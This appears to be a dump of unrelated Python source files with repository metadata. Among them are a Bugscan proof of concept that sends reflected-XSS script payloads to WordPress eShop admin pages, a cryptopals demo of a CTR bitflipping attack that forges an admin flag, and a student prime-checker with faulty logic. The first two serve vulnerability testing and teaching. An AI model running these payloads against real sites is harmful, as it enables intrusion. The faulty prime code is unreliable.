def run(self):
sync_artifacts()
develop.run(self)
class Sdist(sdist):
"""Build sdist."""
# TODO: Option name must be a byte string in Python 2. Remove
# this call once support for Python 2 is dropped.
user_options = sdist.user_options + [
(str("no-sync-artifacts"), None,
"Don't sync the artifact repo. This is unnecessary for "
"clients and old client build OSes can't make the SSL connection."),
]
def initialize_options(self):
self.no_sync_artifacts = None
sdist.initialize_options(self)
def run(self):
if not self.no_sync_artifacts:
sync_artifacts()
sdist.run(self)
def make_release_tree(self, base_dir, files):
sdist.make_release_tree(self, base_dir, files)
sdist_version_ini = os.path.join(base_dir, "version.ini")
if os.path.exists(sdist_version_ini):
os.unlink(sdist_version_ini)
shutil.copy(
os.path.join(THIS_DIRECTORY, "../../version.ini"), sdist_version_ini)
data_files = list(
itertools.chain(
find_data_files("executables"),
find_data_files("install_data"),
find_data_files("scripts"),
find_data_files("grr_response_core/artifacts"),
# TODO: For some reason, this path cannot be unicode string
# or else installation fails for Python 2 (with "too many values to
# unpack" error). This call should be removed once support for Python 2
# is dropped.
[str("version.ini")],
))
setup_args = dict(
name="grr-response-core",
version=VERSION.get("Version", "packageversion"),
description="GRR Rapid Response",
license="Apache License, Version 2.0",
url="https://github.com/google/grr",
maintainer="GRR Development Team",
maintainer_email="[email protected]",
python_requires=">=3.6",
packages=find_packages(),
zip_safe=False,
include_package_data=True,
ext_modules=[
Extension(
# TODO: In Python 2, extension name and sources have to
# be of type `bytes`. These calls should be removed once support for
# Python 2 is dropped.
name=str("grr_response_core._semantic"),
sources=[str("accelerated/accelerated.c")])
],
cmdclass={
"develop": Develop,
"install": install,
"sdist": Sdist,
},
install_requires=[
# TODO: This should be 3.3.2, but AppVeyor has issues with
# that version.
"cryptography==2.9.2",
"distro==1.5.0",
"fleetspeak==0.1.9",
"grr-response-proto==%s" % VERSION.get("Version", "packagedepends"),
"ipaddr==2.2.0",
"ipython==7.15.0",
"pexpect==4.8.0",
"pip>=21.0.1",
"psutil==5.7.0",
"python-crontab==2.5.1",
"python-dateutil==2.8.1",
"pytsk3==20200117",
"pytz==2020.1",
"PyYAML==5.4.1",
"requests==2.25.1",
"yara-python==4.0.1",
],
# Data files used by GRR. Access these via the config_lib "resource" filter.
data_files=data_files)
setup(**setup_args)
| [
"[email protected]"
] | |
68f9071bc2d3e1d43621faf123d7dcbc6640e22f | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_294/ch31_2020_04_13_14_21_04_841403.py | bcd912b0ee45d59242beaa15252d42d13f62912d | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | def eh_primo (n):
if n == 0 or n == 1:
return False
elif n == 2:
return True
for i in range (3, n,2):
if (n%i ==0):
return False
elif (n%i == 0):
return False
else:
return True | [
"[email protected]"
] | |
b75873de168a812387237e063712ca12fa4a326b | eff7b3aae8b923ca1ca82bffcfb7327030fcfb08 | /4/4.26.py | d0448e0908a9773136139dfa98a9dbe1a1a13daf | [] | no_license | blegloannec/cryptopals | fec708c59caaa21ec2eeb47ed7dda7498a4c36b1 | 438bc0653981e59722a728c7232a1ea949e383ee | refs/heads/master | 2022-05-19T02:48:47.967056 | 2021-12-28T13:02:04 | 2022-03-07T17:02:40 | 143,565,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,589 | py | #!/usr/bin/env python3
# this is 2.16 (CBC bitflipping) for CTR, which is trivial
# as in CTR mode the plaintext is xored against the generated
# stream, hence it is directly vulnerable to bitflipping: any bit
# flipped in the ciphertext will be flipped in the decrypted text
from Cryptodome.Cipher import AES
from Cryptodome.Random import get_random_bytes
BS = 16
## SECRET DATA
PREF = b'comment1=cooking%20MCs;userdata='
SUFF = b';comment2=%20like%20a%20pound%20of%20bacon'
Key = get_random_bytes(BS)
Nonce = get_random_bytes(BS//2)
##
def encrypt(userdata: str) -> bytes:
userdata = userdata.replace(';','";"').replace('=','"="').encode()
data = PREF + userdata + SUFF
return AES.new(Key, AES.MODE_CTR, nonce=Nonce).encrypt(data)
# contrary to 2.16, here we can even decode the decrypted text without any problem!
TARGET = ';admin=true;'
def decrypt(ciph: bytes) -> bool:
data = AES.new(Key, AES.MODE_CTR, nonce=Nonce).decrypt(ciph).decode()
print(data)
return TARGET in data
if __name__=='__main__':
assert not decrypt(encrypt(TARGET))
# as in 2.16, we assume we already know BS and the prefix size
PREF_SIZE = len(PREF)
target = bytearray(TARGET.encode())
# we flip the parity bit of the filtered bytes of the target
flips = [i for i,c in enumerate(target) if c in b';=']
for b in flips:
target[b] ^= 1
target = target.decode()
ciph = encrypt(target)
# and simply flip them back in the ciphertext to
ciph = bytearray(ciph)
for b in flips:
ciph[PREF_SIZE+b] ^= 1
assert decrypt(ciph)
| [
"[email protected]"
] | |
ceb0496d20400be814da009ed346bfa457d2b81c | 8c8463413e92149ad0ff16eac0b09303ec18de99 | /ddt_python/ddt_container_nSvgTable.py | 49598644a372ca534c89455733b6531bc85f4502 | [
"MIT"
] | permissive | dmccloskey/ddt_python | 23d0d4d2193fe052545b890ef332056f869117cf | 60624701a01520db81c89b36be6af385a5274aba | refs/heads/master | 2021-01-19T02:01:57.769244 | 2016-12-02T01:21:11 | 2016-12-02T01:21:11 | 48,295,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,278 | py | from .ddt_container import ddt_container
from .ddt_tile import ddt_tile
from .ddt_tile_html import ddt_tile_html
class ddt_container_nSvgTable(ddt_container):
def make_nSvgTable(self,
data1,data2,
data1_keys,data1_nestkeys,data1_keymap,
data2_keys,data2_nestkeys,data2_keymap,
tileheader,
svgtype,
tabletype,
svgx1axislabel='',
svgy1axislabel='',
single_plot_I=True,
svgkeymap = [],
svgtile2datamap=[0],
svgfilters=None,
tablefilters=None,
tableheaders=None
):
'''Make a filter menu + n SVGs + Table
INPUT:
data1 = listDict of all data
data2 = listDict of all data (single plot with a different data from data 1 or a single plot with data 1/2)
dictColumn of all data (dictionary of data split into different SVGs, required for multiple plots);
parameters for filtermenu and table
data1_keys
data1_nestkeys
data1_keymap
parameters for the svg objects
data2_keys
data2_nestkeys
data2_keymap
tileheader = title for each of the tiles
svgtype = type of svg (TODO: add optional input for specifying specific svgs for multiple plots)
tabletype = type of table
single_plot_I = plot all data on a single svg or partition into seperate SVGs
True, only data1 will be used
False, data2 must specified
OPTIONAL INPUT for single plot:
svgkeymap = default, [data2_keymap],
svgtile2datamap= default, [0],
'''
#make the form
form = ddt_tile();
form.make_tileparameters(
tileparameters={
'tileheader':'Filter menu',
'tiletype':'html',
'tileid':"filtermenu1",
'rowid':"row1",
'colid':"col1",
'tileclass':"panel panel-default",
'rowclass':"row",
'colclass':"col-sm-6"}
);
form.make_htmlparameters(
htmlparameters = {
'htmlid':'filtermenuform1',
"htmltype":'form_01',
"formsubmitbuttonidtext":{'id':'submit1','text':'submit'},
"formresetbuttonidtext":{'id':'reset1','text':'reset'},
"formupdatebuttonidtext":{'id':'update1','text':'update'}},
);
self.add_parameters(form.get_parameters());
self.update_tile2datamap("filtermenu1",[0]);
self.add_filtermenu(
{"filtermenuid":"filtermenu1",
"filtermenuhtmlid":"filtermenuform1",
"filtermenusubmitbuttonid":"submit1",
"filtermenuresetbuttonid":"reset1",
"filtermenuupdatebuttonid":"update1"}
);
# data 1:
self.add_data(
data1,
data1_keys,
data1_nestkeys
);
# tile 1-n features: count
if not single_plot_I:
rowcnt = 1;
colcnt = 1;
cnt = 0;
for k,v in data2.items():
svgtileid = "tilesvg"+str(cnt);
svgid = 'svg'+str(cnt);
iter=cnt+1; #start at 1
if (cnt % 2 == 0):
rowcnt = rowcnt+1;#even
colcnt = 1;
else:
colcnt = colcnt+1;
# svg
svg = ddt_tile();
svg.make_tileparameters(
tileparameters={
'tileheader':tileheader,
'tiletype':'svg',
'tileid':svgtileid,
'rowid':"row"+str(rowcnt),
'colid':"col"+str(colcnt),
'tileclass':"panel panel-default",
'rowclass':"row",
'colclass':"col-sm-6"
});
svg.make_svgparameters(
svgparameters={
"svgtype":svgtype,
"svgkeymap":[data2_keymap],
'svgid':'svg'+str(cnt),
"svgmargin":{ 'top': 50, 'right': 150, 'bottom': 50, 'left': 50 },
"svgwidth":500,
"svgheight":350,
"svgx1axislabel":data2_keymap['xdata'],
"svgy1axislabel":data2_keymap['ydata']
}
);
self.add_parameters(svg.get_parameters());
self.update_tile2datamap(svgtileid,[iter]);
self.add_data(
v,
data2_keys,
data2_nestkeys
);
cnt+=1;
else:
cnt = 0;
svgtileid = "tilesvg"+str(cnt);
svgid = 'svg'+str(cnt);
rowcnt = 2;
colcnt = 1;
# make the svg object
svg = ddt_tile();
svg.make_tileparameters(
tileparameters={
'tileheader':tileheader,
'tiletype':'svg',
'tileid':svgtileid,
'rowid':"row"+str(rowcnt),
'colid':"col"+str(colcnt),
'tileclass':"panel panel-default",
'rowclass':"row",
'colclass':"col-sm-6"
});
# make the svg parameters
if not svgkeymap:
svgkeymap = [data2_keymap];
svg.make_svgparameters(
svgparameters={
"svgtype":svgtype,
"svgkeymap":svgkeymap,
'svgid':svgid,
"svgmargin":{ 'top': 50, 'right': 150, 'bottom': 50, 'left': 50 },
"svgwidth":350,
"svgheight":250,
"svgx1axislabel":data2_keymap['xdata'],
"svgy1axislabel":data2_keymap['ydata']
}
);
self.add_parameters(svg.get_parameters());
self.update_tile2datamap(svgtileid,svgtile2datamap);
#add data 2
if data2:
self.add_data(
data2,
data2_keys,
data2_nestkeys
);
cnt+=1;
# make the table object
crosstable = ddt_tile();
crosstable.make_tileparameters(
tileparameters = {
'tileheader':'Table',
'tiletype':'table',
'tileid':"tabletile1",
'rowid':"row"+str(rowcnt+1),
'colid':"col1",
'tileclass':"panel panel-default",
'rowclass':"row",
'colclass':"col-sm-12"
}
);
crosstable.make_tableparameters(
tableparameters = {
"tabletype":tabletype,
'tableid':'table1',
"tablefilters":tablefilters,
"tableclass":"table table-condensed table-hover",
'tableformtileid':'tile1',
"tablekeymap":[data2_keymap],
"tableheaders":tableheaders,}
);
self.add_parameters(crosstable.get_parameters());
self.update_tile2datamap("tabletile1",[0]); | [
"[email protected]"
] | |
c98ea5753067696b58095c2bc6f8717a0a9e8274 | 47cde4a1cfbb05aa256064e03c6ab85650865ee4 | /jackbox/bombintern.py | 7663ac4f0a2d2322468e04115302cc8865952578 | [
"Apache-2.0"
] | permissive | Gorialis/jackbox.py | 54b5bbb25afd9233a594c6d1e861528b0dd3349e | 509bdab63a56114b2d5c8d1fe3220bc7f04ea834 | refs/heads/master | 2021-01-15T00:13:26.902245 | 2020-02-24T16:15:19 | 2020-02-24T16:15:19 | 242,808,186 | 0 | 0 | Apache-2.0 | 2020-02-24T18:13:48 | 2020-02-24T18:13:47 | null | UTF-8 | Python | false | false | 6,784 | py | """
/jackbox/bombintern.py
Copyright (c) 2020 ShineyDev
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from jackbox.client import Client
class BombCorpClient(Client):
async def add(self, ingredient: str):
"""
|coro|
Adds an ingredient to a ``CoffeeBomb``.
Parameters
----------
ingredient: :class:`str`
The ingredient to add.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"add": True,
"ingredient": ingredient},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def brew(self):
"""
|coro|
Brews the ``CoffeeBomb``.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"brew": True},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def cut(self, index: int):
"""
|coro|
Cuts a wire on a ``WiredBomb``.
Parameters
----------
index: :class:`int`
The index of the wire.
.. note::
Indexing starts at ``1``.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"index": index},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def file(self, name: str):
"""
|coro|
Files a file on a ``FilingBomb``.
Parameters
----------
name: :class:`str`
The **full** name of the file.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"file": name},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def menu(self):
"""
|coro|
Returns to the menu.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"decision": "Gameover_Menu"},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def next_day(self):
"""
|coro|
Starts the next day.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"decision": "Gameover_Continue"},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def press(self, index: int):
"""
|coro|
Presses a button on a ``CopierBomb`` or a ``KeypadBomb``.
Parameters
----------
index: :class:`int`
The index of the button.
.. note::
Indexing starts at ``1``.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"index": index},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def remove(self, ingredient: str):
"""
|coro|
Removes an ingredient from a ``CoffeeBomb``.
Parameters
----------
ingredient: :class:`str`
The ingredient to remove.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"remove": True,
"ingredient": ingredient},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def retry_day(self):
"""
|coro|
Retries the current day.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"decision": "Gameover_Retry"},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def smash(self, name: str):
"""
|coro|
Smashes an object on a ``SmashPuzzle``.
Parameters
----------
name: :class:`str`
The name of the object.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"object": name},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
| [
"[email protected]"
] | |
633d077282121e7fe1fc26969cdcd75566891280 | c2773c3835ff5460c1fb80d604137274c9c6650f | /testing_app_hello_de_9234/urls.py | c44e8432154c596941c897e59e88734dba2f4836 | [] | no_license | crowdbotics-apps/testing-app-hello-de-9234 | 6311ddc71b9bb93bed6fb6f530bd74de39c889f5 | 846d7f1acfd5594b2578a6f15da8b551f2cf3abc | refs/heads/master | 2022-12-06T03:23:21.456801 | 2020-08-18T15:02:27 | 2020-08-18T15:02:27 | 288,486,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,975 | py | """testing_app_hello_de_9234 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
urlpatterns = [
path("", include("home.urls")),
path("accounts/", include("allauth.urls")),
path("api/v1/", include("home.api.v1.urls")),
path("admin/", admin.site.urls),
path("users/", include("users.urls", namespace="users")),
path("rest-auth/", include("rest_auth.urls")),
# Override email confirm to use allauth's HTML view instead of rest_auth's API view
path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
path("rest-auth/registration/", include("rest_auth.registration.urls")),
]
admin.site.site_header = "testing app hello"
admin.site.site_title = "testing app hello Admin Portal"
admin.site.index_title = "testing app hello Admin"
# swagger
api_info = openapi.Info(
title="testing app hello API",
default_version="v1",
description="API documentation for testing app hello App",
)
schema_view = get_schema_view(
api_info,
public=True,
permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
| [
"[email protected]"
] | |
03a090ef84ebad55c3aca6d91af5ba0140a7717e | 0d8ee78f61660343e5feec41a53269dbf5585fa3 | /Demo11/detect_nan.py | 17ba54a1b6bb67f238e3c1cd79adac06a036808d | [] | no_license | x-jeff/Python_Code_Demo | 41b033f089fa19d8c63b2f26bf66ef379738c4ad | 9bc458b08cfae0092e8f11a54031ca2e7017affc | refs/heads/master | 2023-07-29T16:34:34.222620 | 2023-07-09T10:38:23 | 2023-07-09T10:38:23 | 176,306,727 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,509 | py | import numpy as np
import pandas as pd
#使用np.nan表示缺失值
print(np.nan)
#构建一组含有缺失值的数据
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,140],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87]])
#赋予列名
df.columns=["Name","Gender","Age","Height","Weight"]
print(df)
#判断是否存在缺失值
#检查第1行是否存在缺失值
print(df.loc[0].isnull().values.any())#返回False说明无缺失值
print(df[0:1].isnull().values.any())#另一种表达方式,也是检查第1行是否有缺失值
#检查第3列是否存在缺失值
print(df["Age"].isnull().values.any())#返回True说明存在缺失值
#判断整个DataFrame中是否存在缺失值
print(df.isnull().values.any())#返回True说明DataFrame中存在缺失值
#判断缺失值的具体位置
#判断第4行缺失值的具体位置
print(df.loc[3].isnull())#False为非缺失值,True为缺失值
print(df.loc[3].notnull())#False为缺失值,True为非缺失值
#判断第5列缺失值的具体位置
print(df["Weight"].isnull())
print(df["Weight"].notnull())
#判断整个DataFrame中是否存在缺失值
print(df.isnull())
print(df.notnull())
#同时检查所有列是否存在缺失值
print(df.isnull().any())
#统计缺失值的数量
#统计第2行缺失值的数量
print(df.loc[1].isnull().sum())
#统计第3列缺失值的数量
print(df["Age"].isnull().sum())
#整个DataFrame缺失值的数量
print(df.isnull().sum())#按列统计
print(df.isnull().sum().sum())#总计 | [
"[email protected]"
] | |
79ca884a8a20ea2993f277d5ff1ca22a268617bf | e0c8662a56d89730043146ddc340e9e0b9f7de72 | /plugin/1193d0d2-1596.py | 393dab9cbff6fc791ad1a466479311cea838e4a3 | [] | no_license | izj007/bugscan_poc | f2ef5903b30b15c230b292a1ff2dc6cea6836940 | 4490f3c36d4033bdef380577333722deed7bc758 | refs/heads/master | 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 953 | py | #coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
"""
POC Name : WordPress eShop Plugin 6.2.8 Multiple Cross Site Scripting Vulnerabilities
From : http://www.exploit-db.com/exploits/36038/
"""
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
payloads = ("wp-admin/admin.php?page=eshop-templates.php&eshoptemplate=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E",
"wp-admin/admin.php?page=eshop-orders.php&view=1&action=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E")
for payload in payloads:
target_url=arg + payload
code, head, res, errcode, _ = curl.curl(target_url)
if code == 200 and res.find('alert(/hello_topper/)') != -1:
security_info(verify_url + 'Wordpress eShop Reflected XSS')
if __name__ == '__main__':
import sys
from dummy import *
audit(assign('wordpress', 'http://www.example.com/')[1]) | [
"[email protected]"
] | |
4019557ed0cfcbf40d9968b2c7b943898e927a02 | 8b5d68c9398186cae64dbcc5b293d62d69e1921d | /src/python/knowledge_base/resolvers/external_uri_resolver.py | 04e75899a585cc5c3a751bae5e325ba7624f7e60 | [
"Apache-2.0"
] | permissive | reynoldsm88/Hume | ec99df21e9b9651ec3cacfb8655a510ba567abc9 | 79a4ae3b116fbf7c9428e75a651753833e5bc137 | refs/heads/master | 2020-07-24T21:28:39.709145 | 2019-07-10T15:43:24 | 2019-07-10T15:43:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,032 | py |
from knowledge_base import KnowledgeBase
from kb_resolver import KBResolver
from utilities.awake_db import AwakeDB
class ExternalURIResolver(KBResolver):
def __init__(Self):
pass
def resolve(self, kb, awake_db):
print "ExternalURIResolver RESOLVE"
resolved_kb = KnowledgeBase()
super(ExternalURIResolver, self).copy_all(resolved_kb, kb)
if awake_db == "NA":
return resolved_kb
kb_entity_to_entity_group = dict()
for entgroupid, kb_entity_group in resolved_kb.get_entity_groups():
for kb_entity in kb_entity_group.members:
kb_entity_to_entity_group[kb_entity] = kb_entity_group
AwakeDB.initialize_awake_db(awake_db)
for entid, kb_entity in resolved_kb.entid_to_kb_entity.iteritems():
kb_entity_group = kb_entity_to_entity_group[kb_entity]
source_string = AwakeDB.get_source_string(kb_entity_group.actor_id)
if source_string is not None and source_string.find("dbpedia.org") != -1:
formatted_string = source_string.strip()
if source_string.startswith("<"):
source_string = source_string[1:]
if source_string.endswith(">"):
source_string = source_string[0:-1]
source_string = source_string.replace("dbpedia.org/resource", "en.wikipedia.org/wiki", 1)
kb_entity.properties["external_uri"] = source_string
# For countries, add geoname_id to properties
if (kb_entity_group.actor_id is not None
and "external_uri" not in kb_entity.properties
and "geonameid" not in kb_entity.properties):
geonameid = AwakeDB.get_geonameid_from_actorid(kb_entity_group.actor_id)
if geonameid is not None and len(str(geonameid).strip()) != 0:
kb_entity.properties["geonameid"] = str(geonameid)
return resolved_kb
| [
"[email protected]"
] | |
be3e5ac6319e9a7c5be95767c07575e031faad4e | 06f7ffdae684ac3cc258c45c3daabce98243f64f | /vsts/vsts/service_endpoint/v4_1/models/__init__.py | 47ad6d9342d71732fff5ee083b4be1aa50f569bb | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | kenkuo/azure-devops-python-api | 7dbfb35f1c9637c9db10207824dd535c4d6861e8 | 9ac38a97a06ee9e0ee56530de170154f6ed39c98 | refs/heads/master | 2020-04-03T17:47:29.526104 | 2018-10-25T17:46:09 | 2018-10-25T17:46:09 | 155,459,045 | 0 | 0 | MIT | 2018-10-30T21:32:43 | 2018-10-30T21:32:42 | null | UTF-8 | Python | false | false | 3,189 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .authentication_scheme_reference import AuthenticationSchemeReference
from .authorization_header import AuthorizationHeader
from .client_certificate import ClientCertificate
from .data_source import DataSource
from .data_source_binding import DataSourceBinding
from .data_source_binding_base import DataSourceBindingBase
from .data_source_details import DataSourceDetails
from .dependency_binding import DependencyBinding
from .dependency_data import DependencyData
from .depends_on import DependsOn
from .endpoint_authorization import EndpointAuthorization
from .endpoint_url import EndpointUrl
from .graph_subject_base import GraphSubjectBase
from .help_link import HelpLink
from .identity_ref import IdentityRef
from .input_descriptor import InputDescriptor
from .input_validation import InputValidation
from .input_value import InputValue
from .input_values import InputValues
from .input_values_error import InputValuesError
from .reference_links import ReferenceLinks
from .result_transformation_details import ResultTransformationDetails
from .service_endpoint import ServiceEndpoint
from .service_endpoint_authentication_scheme import ServiceEndpointAuthenticationScheme
from .service_endpoint_details import ServiceEndpointDetails
from .service_endpoint_execution_data import ServiceEndpointExecutionData
from .service_endpoint_execution_owner import ServiceEndpointExecutionOwner
from .service_endpoint_execution_record import ServiceEndpointExecutionRecord
from .service_endpoint_execution_records_input import ServiceEndpointExecutionRecordsInput
from .service_endpoint_request import ServiceEndpointRequest
from .service_endpoint_request_result import ServiceEndpointRequestResult
from .service_endpoint_type import ServiceEndpointType
__all__ = [
'AuthenticationSchemeReference',
'AuthorizationHeader',
'ClientCertificate',
'DataSource',
'DataSourceBinding',
'DataSourceBindingBase',
'DataSourceDetails',
'DependencyBinding',
'DependencyData',
'DependsOn',
'EndpointAuthorization',
'EndpointUrl',
'GraphSubjectBase',
'HelpLink',
'IdentityRef',
'InputDescriptor',
'InputValidation',
'InputValue',
'InputValues',
'InputValuesError',
'ReferenceLinks',
'ResultTransformationDetails',
'ServiceEndpoint',
'ServiceEndpointAuthenticationScheme',
'ServiceEndpointDetails',
'ServiceEndpointExecutionData',
'ServiceEndpointExecutionOwner',
'ServiceEndpointExecutionRecord',
'ServiceEndpointExecutionRecordsInput',
'ServiceEndpointRequest',
'ServiceEndpointRequestResult',
'ServiceEndpointType',
]
| [
"[email protected]"
] | |
0c0bbbb50d63c87813b656441d38ee608227be9a | 8b7778d3c65f3688105e43718152da2c734ffa26 | /3.Application_Test/cases/YBJZ_Test/Pay_Test.py | 1fa5b3afab9534fdabc988bd759629709f20a863 | [] | no_license | zzworkaccount/OpenSourceLibrary | ab49b3f431c0474723dfad966ca09e29b07527eb | 0f99f881eb8a1f4ddebbc5e7676289d01e6ffe19 | refs/heads/main | 2023-01-29T05:02:56.341004 | 2020-12-03T12:05:59 | 2020-12-03T12:05:59 | 315,920,584 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | # 支出
import unittest
from time import sleep
from lib.Tally.Action import Action
class Test_Pay(unittest.TestCase):
def setUp(self):
self.lg = Action()
self.driver = self.lg.driver
def test_pay(self ):
"""支出"""
self.lg.do_pay()
sleep(1)
count = 0
# 获取完成支付后的文本信息
pay_text = self.driver.find_element_by_xpath\
('(//*/android.widget.LinearLayout[2]/android.widget.LinearLayout/'
'android.widget.LinearLayout/android.widget.FrameLayout/'
'android.widget.LinearLayout/android.widget.TextView[1])').text
num_text = self.driver.find_element_by_xpath\
('(//*/android.widget.LinearLayout[2]/android.widget.LinearLayout/'
'android.widget.LinearLayout/android.widget.FrameLayout/'
'android.widget.LinearLayout/android.widget.TextView[2])').text
expect = 1
if '餐饮' in pay_text and '-520' == num_text:
count += 1
# 断言
# 框架提供的断言方法
self.assertEqual(count, expect)
| [
"[email protected]"
] | |
9552995971c569ff4f8f6eca60a9625ec1a652e2 | 3bae1ed6460064f997264091aca0f37ac31c1a77 | /pyapps/sampleapp/impl/action/core/job/getXMLSchema/1_job_getXMLSchema.py | 02e7f9e335610b4d5303567e07cd2003e0de3f8c | [] | no_license | racktivity/ext-pylabs-core | 04d96b80ac1942754257d59e91460c3a141f0a32 | 53d349fa6bee0ccead29afd6676979b44c109a61 | refs/heads/master | 2021-01-22T10:33:18.523799 | 2017-06-08T09:09:28 | 2017-06-08T09:09:28 | 54,314,984 | 0 | 0 | null | 2017-06-08T09:09:29 | 2016-03-20T11:55:01 | Python | UTF-8 | Python | false | false | 147 | py | __author__ = 'incubaid'
__priority__= 3
def main(q, i, p, params, tags):
params['result'] = ''
def match(q, i, params, tags):
return True | [
"devnull@localhost"
] | devnull@localhost |
fe4a67605c3ed774089ea1c726953328a7291e58 | 15581a76b36eab6062e71d4e5641cdfaf768b697 | /LeetCode_30days_challenge/2020/May/First Bad Version.py | 714967601f2406326187fa685495ac2b041efcf6 | [] | no_license | MarianDanaila/Competitive-Programming | dd61298cc02ca3556ebc3394e8d635b57f58b4d2 | 3c5a662e931a5aa1934fba74b249bce65a5d75e2 | refs/heads/master | 2023-05-25T20:03:18.468713 | 2023-05-16T21:45:08 | 2023-05-16T21:45:08 | 254,296,597 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 206 | py | def firstBadVersion(n):
l = 0
r = n
while l <= r:
m = l + (r-l) // 2
if isBadVersion(m):
r = m-1
ans = m
else:
l = m+1
return ans
| [
"[email protected]"
] | |
891d0fcc191ad040194c3b84a530df3f83a981ab | c36679186f669c6e3bd1c106c96d4a17be1f5ab1 | /Practice_Anisul/6.py | d7f168fd320b4f1b12435bd0fe54fd71dcb8f103 | [] | no_license | touhiduzzaman-tuhin/python-code-university-life | 60a3d671b200a6f5222c6d176c13c5f20f013509 | 6d2e3d90d430faa5c83fe79e7fb1ebe516994762 | refs/heads/master | 2023-03-22T15:18:10.636203 | 2021-03-06T18:52:04 | 2021-03-06T18:52:04 | 332,467,190 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 125 | py | x = "Tuhin"
print(x)
x = 'Tuhin'
print(x)
x = "\"Tuhin\""
print(x)
x = "\'Tuhin\'"
print(x)
x = "\"Tuhin\'"
print(x) | [
"[email protected]"
] | |
48a0486d3ecc70762a4a94e5d1b121b090b5cb54 | 7357d367b0af4650ccc5b783b7a59090fdde47bb | /workalendar/usa/new_jersey.py | 9bd916ca02e66d3026491150081c6ec359dc4184 | [
"MIT"
